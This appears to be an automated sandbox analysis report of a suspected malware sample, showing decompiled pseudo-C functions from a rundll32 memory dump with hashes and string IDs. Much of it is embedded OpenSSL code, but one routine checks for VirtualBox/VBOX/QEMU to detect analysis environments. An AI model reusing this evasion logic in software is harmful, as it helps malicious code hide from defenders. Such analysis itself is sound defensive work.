                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ..\..\openssl-1.1.0f\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH
                                        • API String ID: 0-486191471
                                        • Opcode ID: 8eb8855e299199fa78fa6bf37b292dc14f7b3d3d1f1b00921f68cae06a8a6809
                                        • Instruction ID: 997754c69fd0a877130f12b8019cb5ecdbf22a2987dbed0fa8f076f6842a47bb
                                        • Opcode Fuzzy Hash: 8eb8855e299199fa78fa6bf37b292dc14f7b3d3d1f1b00921f68cae06a8a6809
                                        • Instruction Fuzzy Hash: 6E025FB23182858AEB758E15E8447AFBBE5F3A4B84F114057EE9547E95DB3CC886CF00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: BMSR$QEMU$qemu
                                        • API String ID: 0-2187671315
                                        • Opcode ID: 9bbd8f77e21beda5b1a230b070378a9d317c7180325cd3574879d939862a6e66
                                        • Instruction ID: e295174b0337d1390a916a1e5e50228003bb52fba0139293d63e9672d9478b52
                                        • Opcode Fuzzy Hash: 9bbd8f77e21beda5b1a230b070378a9d317c7180325cd3574879d939862a6e66
                                        • Instruction Fuzzy Hash: 2601A73131038082EF50EB52B9C46DBA7E1E7A8BC4F455026AF0987F4AEA3CCD46C744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 43%
                                        			E0000021E21EF301EF51(void* __rax, void* __rbx, long long __rsi, intOrPtr _a48, long long _a56, void* _a64) {
                                        				intOrPtr _t16;
                                        				void* _t22;
                                        				void* _t28;
                                        				void* _t33;
                                        				void* _t39;
                                        
                                        				_t31 = __rsi;
                                        				_t22 = __rbx;
                                        				if (__rax == 0) goto 0xf301efbf;
                                        				_a56 = __rsi;
                                        				_t16 = _a48;
                                        				r9d = _t16;
                                        				if (E0000021E21EF3021320(__rax, __rbx, "VirtualBox", _t28, __rax, __rsi, _t33, __rax, _t39) != 0) goto 0xf301efad;
                                        				r9d = _t16;
                                        				if (E0000021E21EF3021320(E0000021E21EF3021320(__rax, __rbx, "VirtualBox", _t28, __rax, __rsi, _t33, __rax, _t39), _t22, "vbox", _t28, __rax, _t31, _t33, __rax, _t39) != 0) goto 0xf301efad;
                                        				r9d = _t16;
                                        				if (E0000021E21EF3021320(E0000021E21EF3021320(E0000021E21EF3021320(__rax, __rbx, "VirtualBox", _t28, __rax, __rsi, _t33, __rax, _t39), _t22, "vbox", _t28, __rax, _t31, _t33, __rax, _t39), _t22, "VBOX", _t28, __rax, _t31, _t33, __rax, _t39) == 0) goto 0xf301efb2;
                                        				0xf3111fb0();
                                        				return 1;
                                        			}








                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: VBOX$VirtualBox$vbox
                                        • API String ID: 0-1078916713
                                        • Opcode ID: 483c28d28c78ebee7fd5ef865e302de2355e6e87e320884380a1e2af5826f7e2
                                        • Instruction ID: 7d28d45d454fad02056b83bc79e6811206a416516b9291100c3265cb7143470e
                                        • Opcode Fuzzy Hash: 483c28d28c78ebee7fd5ef865e302de2355e6e87e320884380a1e2af5826f7e2
                                        • Instruction Fuzzy Hash: CD01623130428141EE50A712FD446DAA7E5E7A4BC8F464025EE099BF9AEA39D946C750
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$FileSystem
                                        • String ID: GetSystemTimePreciseAsFileTime
                                        • API String ID: 2086374402-595813830
                                        • Opcode ID: 0c9a3d7744762a1f31ab0d55b459eefc88dabd928b301c7caa30f633a756dcee
                                        • Instruction ID: 8c53ff66476f93e9bbcfe5e5af217b5fb55f15a395a23ecaa708ef99636f9aed
                                        • Opcode Fuzzy Hash: 0c9a3d7744762a1f31ab0d55b459eefc88dabd928b301c7caa30f633a756dcee
                                        • Instruction Fuzzy Hash: 7CF0E530211A4591FE15DB55FD582EB53F1EB5ABC1F4650319D1A07F55DE3CC456C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E0000021E21EF3121E60(void* __ecx, long long __rbx, void* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a24, long long _a32) {
                                        				void* _t9;
                                        				void* _t13;
                                        
                                        				_a8 = __rbx;
                                        				_a24 = __rbp;
                                        				_a32 = __rsi;
                                        				if (__rdx != 0) goto 0xf3121e9a;
                                        				return E0000021E21EF3121358(__ecx, _t9, _t13, __rdx);
                                        			}





                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Wcsftime$_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 4239037671-0
                                        • Opcode ID: 80730935346aab5924bd2850c5ff26b215035e503c7cbe009f67598e29617299
                                        • Instruction ID: 3ae6886bfc170e0e30fae1508779f6a94e060ac5f3426e03f18e531eb7c9b559
                                        • Opcode Fuzzy Hash: 80730935346aab5924bd2850c5ff26b215035e503c7cbe009f67598e29617299
                                        • Instruction Fuzzy Hash: 4F71AF3221478042FF78DA25A8493AF62F1F7A57A4F554225AF9983EDADF3CC413C604
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E0000021E21EF304A560(long long _a40, long long _a48, intOrPtr _a72, long long _a88) {
                                        				void* _t66;
                                        				void* _t69;
                                        				void* _t102;
                                        				intOrPtr* _t104;
                                        				signed char* _t105;
                                        				void* _t106;
                                        				void* _t107;
                                        				signed char* _t111;
                                        				long long _t128;
                                        				long long _t132;
                                        				long long _t134;
                                        				void* _t138;
                                        
                                        				E0000021E21EF310C220();
                                        				_t106 = _t107;
                                        				if (( *(_t107 + 0xc0) & 0x00000100) != 0) goto 0xf304aa42;
                                        				_a88 = _t134;
                                        				_a40 = _t128;
                                        				E0000021E21EF303DA70(0x40);
                                        				r9d = 0;
                                        				E0000021E21EF3091460(_t104, _t106, _t106, _t104, _t132, _t134, _t106 + 0x110, _t138);
                                        				if (E0000021E21EF308EA40(_t104, _t106) != 0) goto 0xf304a5b9;
                                        				 *(_t106 + 0xc0) =  *(_t106 + 0xc0) | 0x00000040;
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t104, _t106);
                                        				if (_t104 == 0) goto 0xf304a62e;
                                        				if ( *_t104 == 0) goto 0xf304a5e0;
                                        				 *(_t106 + 0xc0) =  *(_t106 + 0xc0) | 0x00000010;
                                        				_t111 =  *(_t104 + 8);
                                        				if (_t111 == 0) goto 0xf304a615;
                                        				if ( *((intOrPtr*)(_t111 + 4)) == 0x102) goto 0xf304a603;
                                        				if ( *_t104 == 0) goto 0xf304a603;
                                        				 *((intOrPtr*)(_t106 + 0xb8)) = E0000021E21EF308C1F0(_t104, _t111);
                                        				goto 0xf304a61f;
                                        				 *(_t106 + 0xc0) =  *(_t106 + 0xc0) | 0x00000080;
                                        				 *((intOrPtr*)(_t106 + 0xb8)) = 0;
                                        				goto 0xf304a61f;
                                        				 *((intOrPtr*)(_t106 + 0xb8)) = 0xffffffff;
                                        				E0000021E21EF3091A90(_t104, _t106, _t104, _t104, _t106 + 0x110);
                                        				 *(_t106 + 0xc0) =  *(_t106 + 0xc0) | 0x00000001;
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t104, _t106);
                                        				if (_t104 == 0) goto 0xf304a6b5;
                                        				if (( *(_t106 + 0xc0) & 0x00000010) != 0) goto 0xf304a67a;
                                        				r8d = r8d | 0xffffffff;
                                        				if (E0000021E21EF30916F0(_t104, _t106) >= 0) goto 0xf304a67a;
                                        				r8d = r8d | 0xffffffff;
                                        				if (E0000021E21EF30916F0(_t104, _t106) < 0) goto 0xf304a684;
                                        				 *(_t106 + 0xc0) =  *(_t106 + 0xc0) | 0x00000080;
                                        				if ( *_t104 == 0) goto 0xf304a699;
                                        				 *((intOrPtr*)(_t106 + 0xbc)) = E0000021E21EF308C1F0(_t104,  *_t104);
                                        				goto 0xf304a6a3;
                                        				 *((intOrPtr*)(_t106 + 0xbc)) = 0xffffffff;
                                        				E0000021E21EF3091840(_t104);
                                        				 *(_t106 + 0xc0) =  *(_t106 + 0xc0) | 0x00000400;
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t104, _t106);
                                        				if (_t104 == 0) goto 0xf304a712;
                                        				if ( *_t104 <= 0) goto 0xf304a6fd;
                                        				r8d =  *( *(_t104 + 8)) & 0x000000ff;
                                        				 *(_t106 + 0xc4) = r8d;
                                        				if ( *_t104 - 1 <= 0) goto 0xf304a703;
                                        				_t105 =  *(_t104 + 8);
                                        				 *(_t106 + 0xc4) = ( *(_t105 + 1) & 0x000000ff) << 0x00000008 | r8d;
                                        				goto 0xf304a703;
                                        				 *(_t106 + 0xc4) = 0;
                                        				 *(_t106 + 0xc0) =  *(_t106 + 0xc0) | 0x00000002;
                                        				E0000021E21EF30749F0(_t105);
                                        				r9d = 0;
                                        				_a48 = _t132;
                                        				r8d = 0;
                                        				 *((intOrPtr*)(_t106 + 0xc8)) = 0;
                                        				_t66 = E0000021E21EF3091730(_t105, _t106);
                                        				if (_t105 == 0) goto 0xf304a81e;
                                        				 *(_t106 + 0xc0) =  *(_t106 + 0xc0) | 0x00000004;
                                        				_a72 = 0;
                                        				if (_a72 - E0000021E21EF30290D0(_t66, _t105) >= 0) goto 0xf304a80f;
                                        				E0000021E21EF30292D0(_t67, _a72, _t105);
                                        				_t69 = E0000021E21EF3031F80(_t105, _t105);
                                        				_t102 = _t69 - 0xb4;
                                        				if (_t102 > 0) goto 0xf304a7d3;
                                        				if (_t102 == 0) goto 0xf304a7ca;
                                        				if (_t69 - 0x81 - 0xa > 0) goto 0xf304a7f7;
                                        				goto __rcx;
                                        			}















                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: $
                                        • API String ID: 0-227171996
                                        • Opcode ID: ccedb4ebde485a41ecf417a9171f1e5013778130b84f73e08294f475e0a0bc86
                                        • Instruction ID: 75aa7cae5819f94168413da7a438d848220a205223078d2480af9dc33809a57e
                                        • Opcode Fuzzy Hash: ccedb4ebde485a41ecf417a9171f1e5013778130b84f73e08294f475e0a0bc86
                                        • Instruction Fuzzy Hash: 5DC1823220528186FF589F25DD59BEF77A1E7A0B84F198136DE0647F96EB7C8902CB10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E0000021E21EF304C610(void* __ecx, intOrPtr __edx, void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rdi, long long __rsi, char* __r8, void* __r9, long long __r13, long long __r14, intOrPtr _a8, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, long long _a40, long long _a48, char _a56, signed long long _a80, long long _a88, long long _a96, long long _a104, long long _a112, long long _a160) {
                                        				void* __rbp;
                                        				intOrPtr _t75;
                                        				char _t91;
                                        				void* _t130;
                                        				unsigned int _t131;
                                        				char _t133;
                                        				char _t134;
                                        				signed long long _t181;
                                        				signed long long _t184;
                                        				signed char* _t185;
                                        				long long _t188;
                                        				void* _t189;
                                        				void* _t191;
                                        				char* _t195;
                                        				char* _t196;
                                        				signed long long _t203;
                                        				void* _t217;
                                        				signed int _t219;
                                        				intOrPtr _t222;
                                        				void* _t229;
                                        				signed long long _t230;
                                        				void* _t231;
                                        				intOrPtr _t236;
                                        				signed char* _t240;
                                        				long long _t243;
                                        
                                        				_t243 = __r14;
                                        				_t227 = __rsi;
                                        				_t217 = __rdx;
                                        				_t188 = __rbx;
                                        				E0000021E21EF310C220();
                                        				_t181 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				_a80 = _t181 ^ _t231 - __rax;
                                        				_a36 = __edx;
                                        				_a48 = __rcx;
                                        				_a24 = 0;
                                        				_a32 = 0x18;
                                        				r15d = r9d;
                                        				if (r9d != 0) goto 0xf304c65f;
                                        				goto 0xf304ca28;
                                        				if (r9d != 0xffffffff) goto 0xf304c688;
                                        				r15d = 0;
                                        				if ( *((intOrPtr*)(__r8)) == 0) goto 0xf304c683;
                                        				if (r15d - 0x80000000 >= 0) goto 0xf304c683;
                                        				_t184 = __r8 + 1;
                                        				r15d = r15d + 1;
                                        				if ( *_t184 != 0) goto 0xf304c670;
                                        				asm("inc ecx");
                                        				_t195 = __r8 + 1;
                                        				_a160 = __rbx;
                                        				_t75 =  *__r8 + 0xffffffd0;
                                        				_a112 = __rsi;
                                        				r15d = r15d - 1;
                                        				_a104 = __rdi;
                                        				_a96 = __r13;
                                        				_a88 = __r14;
                                        				_a28 = _t75;
                                        				if (_t75 - 2 > 0) goto 0xf304c9da;
                                        				if (r15d > 0) goto 0xf304c6dd;
                                        				_a8 = 0x42;
                                        				r8d = 0x8a;
                                        				goto 0xf304c9e8;
                                        				_t133 =  *_t195;
                                        				r15d = r15d - 1;
                                        				_t196 = _t195 + 1;
                                        				_a40 = _t196;
                                        				if (r15d <= 0) goto 0xf304c9cc;
                                        				if (_t133 == 0x2e) goto 0xf304c702;
                                        				if (_t133 != 0x20) goto 0xf304c93a;
                                        				r13d = 0;
                                        				if (r15d <= 0) goto 0xf304c7c2;
                                        				_t134 =  *_t196;
                                        				r15d = r15d - 1;
                                        				_a40 = _t196 + 1;
                                        				if (_t134 == 0x20) goto 0xf304c7ba;
                                        				if (_t134 == 0x2e) goto 0xf304c7ba;
                                        				if (_t134 - 0x30 < 0) goto 0xf304c94a;
                                        				if (_t134 - 0x39 > 0) goto 0xf304c94a;
                                        				if (r13d != 0) goto 0xf304c781;
                                        				if (0 - 0x19999991 < 0) goto 0xf304c7f4;
                                        				r13d = 1;
                                        				if (_t229 != 0) goto 0xf304c76f;
                                        				E0000021E21EF3043D30(_t229, _t184, __rsi, _t229);
                                        				_t230 = _t184;
                                        				if (_t184 == 0) goto 0xf304c98c;
                                        				if (E0000021E21EF3044090(_t184, __rbx, _t230, _t217) == 0) goto 0xf304c98c;
                                        				if (E0000021E21EF304B630(_t184, _t188, _t230, _t217) == 0) goto 0xf304c98c;
                                        				if (E0000021E21EF304B340(_t184, _t188, _t230, __rsi - 0x30) == 0) goto 0xf304c98c;
                                        				if (r15d > 0) goto 0xf304c710;
                                        				if (_a24 != 0) goto 0xf304c802;
                                        				if (_a28 - 2 >= 0) goto 0xf304c7d4;
                                        				if (0 - 0x28 >= 0) goto 0xf304c95a;
                                        				if (r13d == 0) goto 0xf304c7ff;
                                        				_t219 = _t184 + _t184 * 4 << 3;
                                        				if (E0000021E21EF304B340(_t184, _t188, _t230, _t219) == 0) goto 0xf304c98c;
                                        				goto 0xf304c802;
                                        				goto 0xf304c7b1;
                                        				r14d = 0;
                                        				if (r13d == 0) goto 0xf304c8b0;
                                        				_t203 = _t230;
                                        				E0000021E21EF3043D90(_t184, _t203);
                                        				_t130 = (_t203 + _t219 >> 2) + (_t203 + _t219 >> 2 >> 0x1f);
                                        				if (_t130 - _a32 <= 0) goto 0xf304c87a;
                                        				_t185 =  &_a56;
                                        				if ( &_a56 == _t185) goto 0xf304c852;
                                        				_t38 = _t243 + 0x7c; // 0x7c
                                        				r8d = _t38;
                                        				E0000021E21EF3025750();
                                        				r8d = 0x7e;
                                        				_a32 = __rdi + 0x20;
                                        				E0000021E21EF3025700();
                                        				_t240 = _t185;
                                        				if (_t185 == 0) goto 0xf304c98c;
                                        				if (_t130 == 0) goto 0xf304c8c7;
                                        				_t131 = _t130 - 1;
                                        				_t91 = E0000021E21EF304B450(_t185, _t230, "..\\..\\openssl-1.1.0f\\crypto\\asn1\\a_object.c");
                                        				if (_t185 == 0xffffffff) goto 0xf304c98c;
                                        				 *((char*)(_t188 + _t240)) = _t91;
                                        				r14d = r14d + 1;
                                        				_t189 = _t188 + 1;
                                        				if (_t131 != 0) goto 0xf304c880;
                                        				goto 0xf304c8c7;
                                        				r14d = r14d + 1;
                                        				 *(_t189 + _t240) = dil & 0x7f;
                                        				if (_t131 >> 7 != 0) goto 0xf304c8b0;
                                        				_t236 = _a48;
                                        				if (_t236 == 0) goto 0xf304c918;
                                        				_t222 = _a24;
                                        				if (__r14 + _t222 - _a36 > 0) goto 0xf304c96a;
                                        				_t191 = _t189 + 1 - 1;
                                        				if (_t191 <= 0) goto 0xf304c908;
                                        				 *(_t236 + _t222 + 1 - 1) =  *(_t191 + _t240) & 0x000000ff | 0x00000080;
                                        				if (_t191 - 1 > 0) goto 0xf304c8f2;
                                        				 *((char*)(0x80 + _t236)) =  *_t240 & 0x000000ff;
                                        				goto 0xf304c91f;
                                        				_a24 = _a24 + r14d;
                                        				if (r15d <= 0) goto 0xf304c9ad;
                                        				goto 0xf304c6f4;
                                        				_a8 = 0x4b;
                                        				r8d = 0x83;
                                        				goto 0xf304c978;
                                        				_a8 = 0x58;
                                        				r8d = 0x82;
                                        				goto 0xf304c978;
                                        				_a8 = 0x6c;
                                        				r8d = 0x93;
                                        				goto 0xf304c978;
                                        				_a8 = 0x94;
                                        				r8d = 0x6b;
                                        				_t60 = _t222 - 0x57; // 0xd
                                        				E0000021E21EF30222D0(_t60, 0x64, r15d, _t185, _t191 - 1, _a40, _t222, __rsi, _t230, "..\\..\\openssl-1.1.0f\\crypto\\asn1\\a_object.c");
                                        				if (_t240 ==  &_a56) goto 0xf304c9fc;
                                        				r8d = 0xa3;
                                        				E0000021E21EF3025750();
                                        				goto 0xf304c9fc;
                                        				if (_t240 ==  &_a56) goto 0xf304c9cc;
                                        				r8d = 0x9e;
                                        				_t224 = "..\\..\\openssl-1.1.0f\\crypto\\asn1\\a_object.c";
                                        				E0000021E21EF3025750();
                                        				E0000021E21EF3043B20( &_a56, _t230);
                                        				goto 0xf304ca06;
                                        				_a8 = 0x3d;
                                        				r8d = 0x7a;
                                        				_t65 = _t224 - 0x57; // 0xd
                                        				E0000021E21EF30222D0(_t65, 0x64, _t240 -  &_a56,  &_a56, _t191 - 1, _t230, "..\\..\\openssl-1.1.0f\\crypto\\asn1\\a_object.c", _t227, _t230, "..\\..\\openssl-1.1.0f\\crypto\\asn1\\a_object.c");
                                        				E0000021E21EF3043B20( &_a56, _t230);
                                        				E0000021E21EF310C290();
                                        				return 0;
                                        			}





























                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ..\..\openssl-1.1.0f\crypto\asn1\a_object.c$=
                                        • API String ID: 0-3591452426
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 65%
                                        			E0000021E21EF2FE3760(long long __rcx, long long __rdx, signed long long __r8) {
                                        				signed int _v12;
                                        				long long _v24;
                                        				long long _v32;
                                        				long long _v40;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				void* __rbx;
                                        				intOrPtr _t60;
                                        				signed int _t74;
                                        				signed int _t81;
                                        				void* _t91;
                                        				void* _t92;
                                        				void* _t105;
                                        				void* _t106;
                                        				signed long long _t107;
                                        				void* _t108;
                                        
                                        				_t107 = __r8;
                                        				_v12 = r9d;
                                        				_v24 = __r8;
                                        				_v32 = __rdx;
                                        				_v40 = __rcx;
                                        				r9d = _v12;
                                        				r9d = r9d & 0x00000003;
                                        				if (r9d == 0) goto 0xf2fe37a5;
                                        				r8d = 0xf5;
                                        				E0000021E21EF31205A8(_t91, _t92, L"nLength % 4 == 0", L"Z:\\hooker2\\Common\\md5.cpp", _t105, _t106, __r8, _t108);
                                        				_v44 = 0;
                                        				_v48 = 0;
                                        				if (_v48 - _v12 >= 0) goto 0xf2fe391b;
                                        				r8d = _v44;
                                        				r9d = 0xffffffff;
                                        				r10d = r9d;
                                        				r10d = r10d ^ 0x000000ff;
                                        				r11d = r9d;
                                        				r11d = r11d ^ 0x12157d02;
                                        				r11d = r11d | 0x12157d02;
                                        				r8d = _v48;
                                        				 *((char*)(_v32 + _t107)) = (( *(_v24 + _t107 * 4) ^ 0xffffffff | r10d) ^ 0xffffffff) & r11d;
                                        				r8d = _v44;
                                        				_t74 =  *(_v24 + _t107 * 4) >> 8;
                                        				r10d = r9d;
                                        				r10d = r10d ^ 0x000000ff;
                                        				r11d = _t74;
                                        				r11d = r11d ^ r10d;
                                        				r11d = r11d & _t74;
                                        				r8d = _v48 - 0xdd427069 + 0xdd42706a;
                                        				 *((char*)(_v32 + _t107)) = r11b;
                                        				r8d = _v44;
                                        				_t81 =  *(_v24 + _t107 * 4) >> 0x10;
                                        				r10d = r9d;
                                        				r10d = r10d ^ 0x000000ff;
                                        				r11d = _t81;
                                        				r11d = r11d ^ r10d;
                                        				r11d = r11d & _t81;
                                        				r10d = 0;
                                        				r10d = r10d - _v48;
                                        				r10d = r10d + 0xfffffffffffffffe;
                                        				r8d = 0 - r10d;
                                        				 *((char*)(_v32 + _t107)) = r11b;
                                        				r8d = _v44;
                                        				r9d = r9d ^ 0x000000ff;
                                        				r8d = _v48 + 0xe1c4fef5 - 0xe1c4fef2;
                                        				 *((char*)(_v32 + _t107)) = ( *(_v24 + _t107 * 4) >> 0x00000018 ^ r9d) &  *(_v24 + _t107 * 4) >> 0x00000018;
                                        				_v44 = _v44 - 0x9c0a09ed + 0x9c0a09ee;
                                        				_t60 = _v48 + 0x7645d3b1 - 0x7645d3ad;
                                        				_v48 = _t60;
                                        				goto 0xf2fe37b5;
                                        				return _t60;
                                        			}




















                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _set_error_mode
                                        • String ID: Z:\hooker2\Common\md5.cpp$nLength % 4 == 0
                                        • API String ID: 1949149715-326578492
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF2FEC0A0() {
                                        				intOrPtr* _t11;
                                        
                                        				r9d =  *((char*)( *_t11));
                                        				r9d = r9d + 0xffffffde;
                                        				if (r9d - 0x59 > 0) goto 0xf2fec0f3;
                                        				r9d =  *(0x21ef2fe0000 + 0xc0f8 + r9d * 4);
                                        				goto __r9;
                                        			}





                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: gfff
                                        • API String ID: 0-1553575800
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF3013E70(void* __rax, void* __rcx, char* __rdx) {
                                        				signed int _t21;
                                        				char* _t39;
                                        				char* _t40;
                                        				char* _t42;
                                        
                                        				if (__rcx - 0x5f5e100 >= 0) goto 0xf3013fad;
                                        				_t42 = "00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899A";
                                        				if (r8d - 0x2710 >= 0) goto 0xf3013ef1;
                                        				if (r8d - 0x3e8 < 0) goto 0xf3013ec0;
                                        				 *__rdx =  *(__rcx + _t42) & 0x000000ff;
                                        				_t39 = __rdx + 1;
                                        				if (r8d - 0x64 < 0) goto 0xf3013ed2;
                                        				 *_t39 =  *(__rax + _t42) & 0x000000ff;
                                        				_t40 = _t39 + 1;
                                        				if (r8d - 0xa < 0) goto 0xf3013ee1;
                                        				 *_t40 =  *(__rdx + _t42) & 0x000000ff;
                                        				_t21 =  *(__rax + _t42) & 0x000000ff;
                                        				 *(_t40 + 1) = _t21;
                                        				return _t21;
                                        			}








                                        Strings
                                        • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899A, xrefs: 0000021EF3013E86, 0000021EF3013FE4, 0000021EF30141A5
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899A
                                        • API String ID: 0-2335613334
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 42%
                                        			E0000021E21EF307EF10(signed int __ebx, void* __ecx, intOrPtr __edx, signed int __ebp, void* __rax, long long __rbx, long long __rcx, void* __r8, void* __r9) {
                                        				void* __rdi;
                                        				void* __rsi;
                                        				void* __rbp;
                                        				void* __r15;
                                        				signed int _t92;
                                        				void* _t108;
                                        				signed int _t111;
                                        				signed int _t113;
                                        				void* _t162;
                                        				void* _t175;
                                        				void* _t183;
                                        				void* _t185;
                                        				void* _t187;
                                        				signed long long _t192;
                                        				signed long long _t195;
                                        				long long _t206;
                                        				intOrPtr _t208;
                                        				signed long long _t210;
                                        				void* _t219;
                                        				void* _t226;
                                        				void* _t247;
                                        				signed long long _t253;
                                        				long long _t255;
                                        				signed char* _t260;
                                        				signed int _t262;
                                        				void* _t266;
                                        				signed long long _t267;
                                        				signed long long _t282;
                                        				void* _t284;
                                        				signed char* _t296;
                                        				signed char* _t298;
                                        				void* _t304;
                                        				void* _t308;
                                        
                                        				_t284 = __r9;
                                        				_t113 = __ebx;
                                        				 *((long long*)(_t266 + 0x10)) = __rbx;
                                        				_push(_t255);
                                        				_push(_t304);
                                        				E0000021E21EF310C220();
                                        				_t267 = _t266 - __rax;
                                        				_t192 =  *0xf3203000; // 0x1fc8e4a4378e
                                        				 *(_t267 + 0xe0) = _t192 ^ _t267;
                                        				r15d = r15d | 0xffffffff;
                                        				_t208 =  *((intOrPtr*)(_t267 + 0x170));
                                        				 *((long long*)(_t267 + 0x50)) =  *((intOrPtr*)(_t267 + 0x158));
                                        				_t195 =  *((intOrPtr*)(_t267 + 0x168));
                                        				r14d = 0;
                                        				 *((intOrPtr*)(_t267 + 0x38)) = __edx;
                                        				 *((long long*)(_t267 + 0x58)) = __rcx;
                                        				 *(_t267 + 0x48) = _t195;
                                        				if (_t195 != 0) goto 0xf307ef92;
                                        				E0000021E21EF303DA70(0xf0);
                                        				 *(_t267 + 0x48) = _t195;
                                        				_t209 =  ==  ? _t195 : _t208;
                                        				 *((long long*)(_t267 + 0x40)) =  ==  ? _t195 : _t208;
                                        				_t210 = E0000021E21EF3041090(_t195, _t195);
                                        				if ( *((intOrPtr*)(_t267 + 0x38)) <= 0) goto 0xf307f3d1;
                                        				if (r12d <= 0) goto 0xf307f3d1;
                                        				if (__ebp - r12d < 0) goto 0xf307f33e;
                                        				if (__ebp - 2 + _t210 * 2 < 0) goto 0xf307f33e;
                                        				r14d = __ebp;
                                        				r14d = r14d - __ebx;
                                        				r8d = 0x9d;
                                        				r14d = r14d - 1;
                                        				E0000021E21EF3025700();
                                        				r8d = 0x9e;
                                        				_t253 = _t195;
                                        				E0000021E21EF3025700();
                                        				 *(_t267 + 0x30) = _t195;
                                        				if (_t253 == 0) goto 0xf307f3ad;
                                        				if (_t195 == 0) goto 0xf307f3ad;
                                        				E0000021E21EF310E410(2 + _t210 * 2, 0, 0, _t162, _t195, "..\\..\\openssl-1.1.0f\\crypto\\rsa\\rsa_oaep.c", _t253,  *((intOrPtr*)(_t267 + 0x150)));
                                        				_t296 =  *(_t267 + 0x30);
